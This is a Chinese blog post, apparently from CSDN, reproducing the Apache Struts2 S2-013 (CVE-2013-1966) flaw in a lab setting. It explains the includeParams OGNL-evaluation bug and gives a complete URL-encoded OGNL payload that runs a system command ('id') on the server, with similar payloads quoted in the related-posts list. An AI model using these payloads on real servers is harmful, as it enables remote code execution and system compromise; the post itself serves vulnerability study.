struts2远程S2-013复现学习

最新推荐文章于 2024-04-06 10:48:21 发布
最新推荐文章于 2024-04-06 10:48:21 发布
阅读量299 收藏
点赞数
分类专栏: 安全 渗透测试 文章标签: 学习 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hklearner/article/details/123901641
版权
本文探讨了Struts2框架中<s:a>和<s:url>标签的includeParams属性可能导致的命令注入问题,通过实例演示了如何利用OGNL表达式解析参数进行恶意操作,并重点介绍了漏洞影响范围和PoC构建方法。
摘要由CSDN通过智能技术生成

S2-013复现

原理

struts2的标签中 和 都有一个 includeParams 属性,可以设置成如下值

none - URL中不包含任何参数(默认)
get - 仅包含URL中的GET参数
all - 在URL中包含GET和POST参数
此时 或尝试去解析原始请求参数时,会导致OGNL表达式的执行

影响版本:Struts 2.0.0-2.3.14

漏洞搭建

Struts2 的标签<s:a><s:url>提供了一个 includeParams 属性。该属性的主要作用域是了解是否包含 http 请求参数。

includeParams 的允许值为:

  1. none - 在 URL 中不包含任何参数(默认)
  2. get - 在 URL 中仅包含 GET 参数
  3. all - 在 URL 中包含 GET 和 POST 参数

当 时includeParams=all,这个请求的 GET 和 POST 参数放在 URL 的 GET 参数上。在此过程中,参数将被 OGNL 表达式解析。它导致命令执行。

poc构建

a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

脚本实习生
关注
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-013(CVE-2013-1966)
qq_51577576的博客
11-24 508
Struts2标签中和都包含一个includeParams属性,其值可设置为none、get 或 all,其对应意义分别为,none:链接不包含请求的任意参数值(默认),get:链接只包含GET请求中的参数和其值,all:链接包含GET和POST所有参数和其值.用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上.这个参数会进行OGNL表达式解析,从而可以插入任意OGNL表达式导致任意代码执行
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1493
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
Struts2 013 漏洞分析
王嘟嘟的博客
05-30 1357
继参数和值之后,出现includeParams相关漏洞。Struts2 是一个基于 Java 的开发框架,用于构建 Web 应用程序。它提供了一组易于使用的组件和标签,可以帮助开发人员创建和管理Web 应用程序。Struts2 帮助开发人员集中精力在业务逻辑方面而不是底层基础架构,简化了 Web 应用程序的开发过程。在Struts2 中,使用MVC(模型-视图-控制器)模式来组织应用程序的代码。它是一种轻量级的框架,可以与其他框架和技术集成。Struts2 是一个基于 Java。
Struts2 S2-013复现
ZJT6666666的博客
12-22 270
Struts2 S2-013复现
[struts2]s2-013 漏洞复现
satasun的博客
12-09 575
[struts2]s2-013 环境搭建 github buuctf poc Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=a
buuctf [struts2]s2-013
qq_1873822的博客
03-16 823
漏洞简介 Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参.
0x19.Apache Struts2远程代码执行漏洞(S2-013)
qq_31679787的博客
09-27 333
通过构造payload执行命令; payload:%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20ja...
漏洞复现----33、Struts2/S2-013/S2-014
七天
06-29 486
文章目录一、漏洞原理二、环境启动三、漏洞复现四、S2-014 一、漏洞原理 S2-013Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,可以设置成如下值: 1、none - URL中不包含任何参数(默认) 2、get - 仅包含URL中的GET参数 3、all - 在URL中包含GET和POST参数此时 或尝试去解析原始请求参数时,会导致OGNL表达式的执行 需要在JSP页面中将s:url、s:a标签中的includeP
【Vulfocus解题复现Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 2716
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1095
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2远程代码执行漏洞分析(S2-013)1
CVE-2012-4969漏洞分析
02-29
CVE-2012-4969漏洞分析,详细的分析了该漏洞的造成原因!
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 776
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
S2-013的一次逐步复现分析
jary__D的博客
11-27 435
站在巨人的肩膀上,嚼烂了分析漏洞
墨者Apache Struts2远程代码执行漏洞(S2-013)复现题解
zr1213159840的博客
01-15 1683
首先查找到漏洞的相关利用信息,链接如下: https://vulhub.org/#/environments/struts2/s2-013/ 能看到poc如下: ?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStrea
Apache Struts2远程代码执行漏洞(S2-013)复现
qq_36933272的博客
09-03 1741
查询原理:s:url和s:a标记都提供includeparams属性。 该属性的主要作用域是了解包含或不包含http://request参数的内容。 INCLUDEParams的允许值为: 无-在URL中不包含任何参数(默认) get-仅在URL中包含get参数 全部-在URL中同时包含get和post参数 包含精心设计的请求参数的请求可用于将任意ognl代码注入堆栈,随后用作URL或标记的请求参...
[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)
k5664524的博客
01-17 572
2.3.1.2 之前的 Apache Struts 允许远程攻击者绕过 ParameterInterceptor 类中的安全保护并执行任意命令。
vulhub中Struts2-013/Struts2-014 远程代码执行漏洞复现
最新发布
yougexiaojiuguan的博客
04-06 545
漏洞复现过程的记录
Struts 2中的constant配置详解
hello world!
12-21 992
通过对这些属性的配置,可以改变Struts 2 框架的一些默认行为,这些配置可以在struts.xml文件中完成,也可以在struts.properties文件中完成 1.  指定Web应用的默认编码集,相当于调用 HttpServletRequest的setCharacterEncoding方法。 2. 该属性设置是否每次HTTP请求到达时,系统都重新加载资源文件。该属性默认
Struts2高危漏洞详解:从S2-001到S2-003
"struts2漏洞列表,包括S2-001和S2-003,描述了这两个高危漏洞的详情、受影响版本及exploit示例" Struts2是一个流行的Java开源框架,用于构建企业级Web应用程序。然而,随着它的广泛使用,一些安全漏洞也逐渐暴露...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

脚本实习生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值